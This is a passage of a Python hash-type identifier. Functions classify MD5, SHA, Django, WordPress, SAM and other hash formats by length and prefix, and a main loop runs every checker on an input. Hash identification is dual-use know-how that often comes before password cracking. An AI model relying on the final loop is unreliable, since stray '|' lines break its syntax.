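        jerar.append("106360")


def md5saltmd5passsalt(hash):
    """md5($salt.md5($pass.$salt)) (106380): 32 hex chars, e.g. 5b8b12ca69d3e7b2a3e2308e7bef3e6f.

    NOTE: this definition wins over the earlier `md5saltmd5passsalt` (106360).
    """
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106380")


def md5saltmd5saltpass(hash):
    """md5($salt.md5($salt.$pass)) (106400): 32 hex chars, e.g. d8f3b3f004d387086aae24326b575b23."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106400")


def md5saltmd5md5passsalt(hash):
    """md5($salt.md5(md5($pass).$salt)) (106420): 32 hex chars, e.g. 81f181454e23319779b03d74d062b1a2."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106420")


def md5username0pass(hash):
    """md5($username.0.$pass) (106440): 32 hex chars, e.g. e44a60f8f2106492ae16581c91edb3ba."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106440")


def md5usernameLFpass(hash):
    """md5($username.LF.$pass) (106460): 32 hex chars, e.g. 654741780db415732eaee12b1b909119."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106460")


def md5usernamemd5passsalt(hash):
    """md5($username.md5($pass).$salt) (106480): 32 hex chars, e.g. 954ac5505fd1843bbb97d1b2cda0b98f."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106480")


def md5md5pass(hash):
    """md5(md5($pass)) (106500): 32 hex chars, e.g. a96103d267d024583d5565436e52dfb3."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106500")


def md5md5passsalt(hash):
    """md5(md5($pass).$salt) (106520): 32 hex chars, e.g. 5848c73c2482d3c2c7b6af134ed8dd89."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106520")


def md5md5passmd5salt(hash):
    """md5(md5($pass).md5($salt)) (106540): 32 hex chars, e.g. 8dc71ef37197b2edba02d48c30217b32."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106540")


def md5md5saltpass(hash):
    """md5(md5($salt).$pass) (106560): 32 hex chars, e.g. 9032fabd905e273b9ceb1e124631bd67."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106560")


def md5md5saltmd5pass(hash):
    """md5(md5($salt).md5($pass)) (106580): 32 hex chars, e.g. 8966f37dbb4aca377a71a9d3d09cd1ac."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106580")


def md5md5usernamepasssalt(hash):
    """md5(md5($username.$pass).$salt) (106600): 32 hex chars, e.g. 4319a3befce729b34c3105dbc29d0c40."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106600")


def md5md5md5pass(hash):
    """md5(md5(md5($pass))) (106620): 32 hex chars, e.g. ea086739755920e732d0f4d8c1b6ad8d."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106620")


def md5md5md5md5pass(hash):
    """md5(md5(md5(md5($pass)))) (106640): 32 hex chars, e.g. 02528c1f2ed8ac7d83fe76f3cf1c133f."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106640")


def md5md5md5md5md5pass(hash):
    """md5(md5(md5(md5(md5($pass))))) (106660): 32 hex chars, e.g. 4548d2c062933dff53928fd4ae427fc0."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106660")


def md5sha1pass(hash):
    """md5(sha1($pass)) (106680): 32 hex chars, e.g. cb4ebaaedfd536d965c452d9569a6b1e."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106680")


def md5sha1md5pass(hash):
    """md5(sha1(md5($pass))) (106700): 32 hex chars, e.g. 099b8a59795e07c334a696a10c0ebce0."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106700")


def md5sha1md5sha1pass(hash):
    """md5(sha1(md5(sha1($pass)))) (106720): 32 hex chars, e.g. 06e4af76833da7cc138d90602ef80070."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106720")


def md5strtouppermd5pass(hash):
    """md5(strtoupper(md5($pass))) (106740): 32 hex chars, e.g. 519de146f1a658ab5e5e2aa9b7d2eec8."""
    if len(hash) == 32 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("106740")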
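def LineageIIC4(hash):
    """Lineage II C4 (107080): '0x' followed by 32 hex chars (34 total),
    e.g. 0x49a57f66bd3d5ba6abda5579c264a0e4.

    The original only required the whole string to be alphanumeric, so '0x'
    followed by any 32 letters/digits matched; the body after the prefix is now
    required to be hexadecimal.
    """
    if len(hash) == 34 and hash.startswith("0x") and set(hash[2:]) <= set("0123456789abcdefABCDEF"):
        jerar.append("107080")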
# Prefixed MD5-based crypt formats, 34 chars each. The '$' in every prefix already
# makes isdigit()/isalpha()/isalnum() false, so the original's four predicates
# reduce to the prefix test; `hash[0:3].find(p)==0` is spelled startswith(p).
# NOTE: detection is tied to the fixed length of the sample hashes (8-char salt
# for $1$); shorter salts are not recognised. Each checker appends its ID to the
# module-level list `jerar`.

def MD5phpBB3(hash):
    """MD5(phpBB3) (107040): '$H$' + 31 chars, e.g. $H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1."""
    if len(hash) == 34 and hash.startswith("$H$"):
        jerar.append("107040")


def MD5Unix(hash):
    """MD5(Unix) md5crypt (107060): '$1$' + 8-char salt + '$' + 22 chars,
    e.g. $1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/."""
    if len(hash) == 34 and hash.startswith("$1$"):
        jerar.append("107060")


def MD5Wordpress(hash):
    """MD5(Wordpress) phpass (107020): '$P$' + 31 chars, e.g. $P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.."""
    if len(hash) == 34 and hash.startswith("$P$"):
        jerar.append("107020")
def MD5APR(hash):
    """MD5(APR) Apache apr1 crypt (108020): 37 chars,
    e.g. $apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1.

    The leading '$' already rules out isdigit()/isalpha(), so the original's extra
    predicates reduce to the prefix test. NOTE: only '$apr' is tested rather than
    the full '$apr1$' magic, and the fixed length assumes an 8-char salt.
    """
    if len(hash) == 37 and hash.startswith("$apr"):
        jerar.append("108020")
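# 160-bit (40 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string (letters g-z included) and rejected valid digests that
# happen to be all digits or all letters a-f; a strict hex-digit check replaces it.

def Haval160(hash):
    """Haval-160 (109100): 40 hex chars, e.g. a106e921284dd69dad06192a4411ec32fce83dbb."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109100")


def Haval160HMAC(hash):
    """Haval-160(HMAC) (109200): 40 hex chars, e.g. 29206f83edc1d6c3f680ff11276ec20642881243."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109200")


def MySQL5(hash):
    """MySQL5 SHA-1(SHA-1($pass)) (109040): 40 hex chars, e.g. 9bb2fb57063821c762cc009f7584ddae9da431ff."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109040")


def MySQL160bit(hash):
    """MySQL 160bit (109060): '*' followed by 40 hex chars (41 total),
    e.g. *2470c0c06dee42fd1618bb99005adca2ec9d1e19.

    The original only checked the '*' and that the string was not all
    alphanumeric; the 40 chars after the '*' are now required to be hex.
    """
    if len(hash) == 41 and hash.startswith("*") and set(hash[1:]) <= set("0123456789abcdefABCDEF"):
        jerar.append("109060")


def RipeMD160(hash):
    """RipeMD-160 (109120): 40 hex chars, e.g. dc65552812c66997ea7320ddfb51f5625d74721b."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109120")


def RipeMD160HMAC(hash):
    """RipeMD-160(HMAC) (109180): 40 hex chars, e.g. ca28af47653b4f21e96c1235984cb50229331359."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109180")


def SHA1(hash):
    """SHA-1 (109020): 40 hex chars, e.g. 4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109020")


def SHA1HMAC(hash):
    """SHA-1(HMAC) (109140): 40 hex chars, e.g. 6f5daac3fee96ba1382a09b1ba326ca73dccf9e7."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109140")


def SHA1MaNGOS(hash):
    """SHA-1(MaNGOS) (109220): 40 hex chars, e.g. a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109220")


def SHA1MaNGOS2(hash):
    """SHA-1(MaNGOS2) (109240): 40 hex chars, e.g. 644a29679136e09d0bd99dfd9e8c5be84108b5fd."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109240")


def Tiger160(hash):
    """Tiger-160 (109080): 40 hex chars, e.g. c086184486ec6388ff81ec9f235287270429b225."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109080")


def Tiger160HMAC(hash):
    """Tiger-160(HMAC) (109160): 40 hex chars, e.g. 6603161719da5e56e1866e4f61f79496334e6a10."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109160")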
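# Salted / nested SHA-1 constructions: all produce a 40 hex char digest, so every
# checker in this group fires on the same inputs and only the ID differs. Each
# appends its ID to the module-level list `jerar`. The original
# isdigit()/isalpha()/isalnum() combination accepted any 40-char alphanumeric
# string and rejected valid all-digit or all-a-f digests; a strict hex-digit
# check replaces it.

def sha1passsalt(hash):
    """sha1($pass.$salt) (109260): 40 hex chars, e.g. f006a1863663c21c541c8d600355abfeeaadb5e4."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109260")


def sha1saltpass(hash):
    """sha1($salt.$pass) (109280): 40 hex chars, e.g. 299c3d65a0dcab1fc38421783d64d0ecf4113448."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109280")


def sha1saltmd5pass(hash):
    """sha1($salt.md5($pass)) (109300): 40 hex chars, e.g. 860465ede0625deebb4fbbedcb0db9dc65faec30."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109300")


def sha1saltmd5passsalt(hash):
    """sha1($salt.md5($pass).$salt) (109320): 40 hex chars, e.g. 6716d047c98c25a9c2cc54ee6134c73e6315a0ff."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109320")


def sha1saltsha1pass(hash):
    """sha1($salt.sha1($pass)) (109340): 40 hex chars, e.g. 58714327f9407097c64032a2fd5bff3a260cb85f."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109340")


def sha1saltsha1saltsha1pass(hash):
    """sha1($salt.sha1($salt.sha1($pass))) (109360): 40 hex chars, e.g. cc600a2903130c945aa178396910135cc7f93c63."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109360")


def sha1usernamepass(hash):
    """sha1($username.$pass) (109380): 40 hex chars, e.g. 3de3d8093bf04b8eb5f595bc2da3f37358522c9f."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109380")


def sha1usernamepasssalt(hash):
    """sha1($username.$pass.$salt) (109400): 40 hex chars, e.g. 00025111b3c4d0ac1635558ce2393f77e94770c5."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109400")


def sha1md5pass(hash):
    """sha1(md5($pass)) (1094202): 40 hex chars, e.g. fa960056c0dea57de94776d3759fb555a15cae87.

    The odd seven-digit ID matches the key used in `algorithms`, so it is kept.
    """
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("1094202")


def sha1md5passsalt(hash):
    """sha1(md5($pass).$salt) (109440): 40 hex chars, e.g. 1dad2b71432d83312e61d25aeb627593295bcc9a."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109440")


def sha1md5sha1pass(hash):
    """sha1(md5(sha1($pass))) (109460): 40 hex chars, e.g. 8bceaeed74c17571c15cdb9494e992db3c263695."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109460")


def sha1sha1pass(hash):
    """sha1(sha1($pass)) (109480): 40 hex chars, e.g. 3109b810188fcde0900f9907d2ebcaa10277d10e."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109480")


def sha1sha1passsalt(hash):
    """sha1(sha1($pass).$salt) (109500): 40 hex chars, e.g. 780d43fa11693b61875321b6b54905ee488d7760."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109500")


def sha1sha1passsubstrpass03(hash):
    """sha1(sha1($pass).substr($pass,0,3)) (109520): 40 hex chars, e.g. 5ed6bc680b59c580db4a38df307bd4621759324e."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109520")


def sha1sha1saltpass(hash):
    """sha1(sha1($salt.$pass)) (109540): 40 hex chars, e.g. 70506bac605485b4143ca114cbd4a3580d76a413."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109540")


def sha1sha1sha1pass(hash):
    """sha1(sha1(sha1($pass))) (109560): 40 hex chars, e.g. 3328ee2a3b4bf41805bd6aab8e894a992fa91549."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109560")


def sha1strtolowerusernamepass(hash):
    """sha1(strtolower($username).$pass) (109580): 40 hex chars, e.g. 79f575543061e158c2da3799f999eb7c95261f07."""
    if len(hash) == 40 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("109580")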
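# 192-bit (48 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string and rejected valid all-digit or all-a-f digests; a
# strict hex-digit check replaces it.

def Haval192(hash):
    """Haval-192 (110040): 48 hex chars, e.g. cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641."""
    if len(hash) == 48 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("110040")


def Haval192HMAC(hash):
    """Haval-192(HMAC) (110080): 48 hex chars, e.g. 39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029."""
    if len(hash) == 48 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("110080")


def Tiger192(hash):
    """Tiger-192 (110020): 48 hex chars, e.g. c086184486ec6388ff81ec9f235287270429b2253b248a70."""
    if len(hash) == 48 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("110020")


def Tiger192HMAC(hash):
    """Tiger-192(HMAC) (110060): 48 hex chars, e.g. 8e914bb64353d4d29ab680e693272d0bd38023afa3943a41."""
    if len(hash) == 48 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("110060")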
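def MD5passsaltjoomla1(hash):
    """md5($pass.$salt) - Joomla (112020): 32 hex chars, ':', 16-char salt (49 total),
    e.g. 35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX.

    The original only checked the length and the ':' at offset 32; the digest
    half is now required to be hexadecimal. The salt is left unchecked, as before.
    """
    if len(hash) == 49 and hash[32] == ":" and set(hash[:32]) <= set("0123456789abcdefABCDEF"):
        jerar.append("112020")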
def SHA1Django(hash):
    """SHA-1(Django) (113020): 'sha1$<salt>$<40 hex>', 52 chars with a 6-char salt,
    e.g. sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448.

    The '$' in the prefix already rules out isdigit()/isalpha()/isalnum(), so the
    original's extra predicates reduce to the prefix test. NOTE: the fixed length
    ties detection to a 6-char salt; other salt lengths are not recognised.
    """
    if len(hash) == 52 and hash.startswith("sha1$"):
        jerar.append("113020")
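# 224-bit (56 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string and rejected valid all-digit or all-a-f digests; a
# strict hex-digit check replaces it.

def Haval224(hash):
    """Haval-224 (114040): 56 hex chars, e.g. f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a."""
    if len(hash) == 56 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("114040")


def Haval224HMAC(hash):
    """Haval-224(HMAC) (114080): 56 hex chars, e.g. f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681."""
    if len(hash) == 56 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("114080")


def SHA224(hash):
    """SHA-224 (114020): 56 hex chars, e.g. e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59."""
    if len(hash) == 56 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("114020")


def SHA224HMAC(hash):
    """SHA-224(HMAC) (114060): 56 hex chars, e.g. c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514."""
    if len(hash) == 56 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("114060")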
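# 256-bit (64 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string (letters g-z included) and rejected valid digests that
# happen to be all digits or all letters a-f; a strict hex-digit check replaces it.

def SHA256(hash):
    """SHA-256 (115020): 64 hex chars,
    e.g. 2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115020")


def SHA256HMAC(hash):
    """SHA-256(HMAC) (115120): 64 hex chars,
    e.g. d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115120")


def Haval256(hash):
    """Haval-256 (115040): 64 hex chars,
    e.g. 7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115040")


def Haval256HMAC(hash):
    """Haval-256(HMAC) (115140): 64 hex chars,
    e.g. 6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115140")


def GOSTR341194(hash):
    """GOST R 34.11-94 (115060): 64 hex chars,
    e.g. ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115060")


def RipeMD256(hash):
    """RipeMD-256 (115080): 64 hex chars,
    e.g. 5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115080")


def RipeMD256HMAC(hash):
    """RipeMD-256(HMAC) (115160): 64 hex chars,
    e.g. 43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115160")


def SNEFRU256(hash):
    """SNEFRU-256 (115100): 64 hex chars,
    e.g. 3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115100")


def SNEFRU256HMAC(hash):
    """SNEFRU-256(HMAC) (115180): 64 hex chars,
    e.g. 4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115180")


def SHA256md5pass(hash):
    """SHA-256(md5($pass)) (115200): 64 hex chars,
    e.g. b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115200")


def SHA256sha1pass(hash):
    """SHA-256(sha1($pass)) (115220): 64 hex chars,
    e.g. afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886."""
    if len(hash) == 64 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("115220")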
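# "32 hex ':' 32 chars" formats (65 chars). Both checkers append their ID to the
# module-level list `jerar`; an input can legitimately match both.

def MD5passsaltjoomla2(hash):
    """md5($pass.$salt) - Joomla (116020): 32 hex chars, ':', 32-char salt,
    e.g. fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2.

    The original only checked the length and the ':' at offset 32; the digest
    half is now required to be hexadecimal. The salt is left unchecked, as before.
    """
    if len(hash) == 65 and hash[32] == ":" and set(hash[:32]) <= set("0123456789abcdefABCDEF"):
        jerar.append("116020")


def SAM(hash):
    """SAM LM_hash:NT_hash (116040): two 32-hex-char halves joined by ':',
    e.g. 4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5.

    Both halves must be hexadecimal (the original did not check the charset at
    all). The original also required islower()==False, which rejected lowercase
    dumps; a lowercase LM:NT pair is just as valid, so case is no longer
    considered. A lowercase pair is also reported as 116020, which shares the
    shape -- the tool lists every candidate.
    """
    if len(hash) == 65 and hash[32] == ":" and set(hash[:32] + hash[33:]) <= set("0123456789abcdefABCDEF"):
        jerar.append("116040")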
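def SHA256Django(hash):
    """SHA-256(Django) (117020): 'sha256$<salt>$<64 hex>', 78 chars with a 6-char salt,
    e.g. sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3.

    The original tested the bare prefix 'sha256' plus isalnum()==False; the
    format always has '$' after the algorithm name, so the '$' is now part of
    the prefix test (which also makes isalnum()==False redundant). NOTE: the
    fixed length ties detection to a 6-char salt; other salt lengths are not
    recognised.
    """
    if len(hash) == 78 and hash.startswith("sha256$"):
        jerar.append("117020")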
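# 320-bit (80 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string and rejected valid all-digit or all-a-f digests; a
# strict hex-digit check replaces it.

def RipeMD320(hash):
    """RipeMD-320 (118020): 80 hex chars,
    e.g. b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef."""
    if len(hash) == 80 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("118020")


def RipeMD320HMAC(hash):
    """RipeMD-320(HMAC) (118040): 80 hex chars,
    e.g. 244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78."""
    if len(hash) == 80 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("118040")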
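# 384-bit (96 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string and rejected valid all-digit or all-a-f digests; a
# strict hex-digit check replaces it.

def SHA384(hash):
    """SHA-384 (119020): 96 hex chars,
    e.g. 3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b."""
    if len(hash) == 96 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("119020")


def SHA384HMAC(hash):
    """SHA-384(HMAC) (119040): 96 hex chars,
    e.g. bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b."""
    if len(hash) == 96 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("119040")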
def SHA256s(hash):
    """'$6$' crypt(3) hash (120020): 98 chars with an 8-char salt,
    e.g. $6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.

    NOTE: '$6$' is the sha512crypt identifier (SHA-512 based; sha256crypt uses
    '$5$'), so the function name is misleading; it is kept because the main
    loop's dispatch list calls it by name. The leading '$' already rules out
    isdigit()/isalpha()/isalnum(), so the original's extra predicates reduce to
    the prefix test. The fixed length assumes an 8-char salt.
    """
    if len(hash) == 98 and hash.startswith("$6$"):
        jerar.append("120020")
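def SHA384Django(hash):
    """SHA-384(Django) (121020): 'sha384$<salt>$<96 hex>', 110 chars with a 6-char salt,
    e.g. sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba.

    The original tested the bare prefix 'sha384' plus isalnum()==False; the
    format always has '$' after the algorithm name, so the '$' is now part of
    the prefix test (which also makes isalnum()==False redundant). NOTE: the
    fixed length ties detection to a 6-char salt; other salt lengths are not
    recognised.
    """
    if len(hash) == 110 and hash.startswith("sha384$"):
        jerar.append("121020")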
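# 512-bit (128 hex char) digests. Each checker appends its ID to the module-level
# list `jerar`. The original isdigit()/isalpha()/isalnum() combination accepted
# any alphanumeric string (letters g-z included) and rejected valid digests that
# happen to be all digits or all letters a-f; a strict hex-digit check replaces it.

def SHA512(hash):
    """SHA-512 (122020): 128 hex chars, e.g.
    ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e."""
    if len(hash) == 128 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("122020")


def SHA512HMAC(hash):
    """SHA-512(HMAC) (122060): 128 hex chars, e.g.
    dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f."""
    if len(hash) == 128 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("122060")


def Whirlpool(hash):
    """Whirlpool (122040): 128 hex chars, e.g.
    76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb."""
    if len(hash) == 128 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("122040")


def WhirlpoolHMAC(hash):
    """Whirlpool(HMAC) (122080): 128 hex chars, e.g.
    77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9."""
    if len(hash) == 128 and set(hash) <= set("0123456789abcdefABCDEF"):
        jerar.append("122080")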
print(logo)
|
||||||
|
try:
|
||||||
|
first = str(argv[1])
|
||||||
|
except:
|
||||||
|
first = None
|
||||||
|
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
jerar=[]
|
||||||
|
print("-"*50)
|
||||||
|
if first:
|
||||||
|
h = first
|
||||||
|
else:
|
||||||
|
h = input(" HASH: ")
|
||||||
|
|
||||||
|
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); 